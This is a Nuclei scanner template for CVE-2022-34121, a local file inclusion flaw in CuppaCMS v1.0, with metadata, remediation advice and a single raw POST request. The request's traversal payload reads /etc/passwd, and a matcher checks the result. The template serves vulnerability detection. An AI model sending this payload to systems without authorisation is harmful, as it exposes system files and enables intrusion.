nuclei-templates/http/cves/2022/CVE-2022-34121.yaml

50 lines
1.5 KiB
YAML

id: CVE-2022-34121
info:
name: CuppaCMS v1.0 - Local File Inclusion
author: edoardottt
severity: high
description: |
Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
remediation: |
Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.
reference:
- https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
- https://github.com/CuppaCMS/CuppaCMS/issues/18
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34121
cwe-id: CWE-829
epss-score: 0.71775
epss-percentile: 0.97748
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cuppacms
product: cuppacms
tags: cve,cve2022,lfi,cuppa,cms
http:
- raw:
- |
POST /templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=../../../../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022049d542377852a8ec17ef3441de27f7d71611cc73856dbe420ed8aefd61a4da0e022100a41311bf66dd1de6cb9ec50242cb3bcbd12c72c78af3a7a1a54d73d8e461f7b9:922c64590222798bb761d5b6d8e72950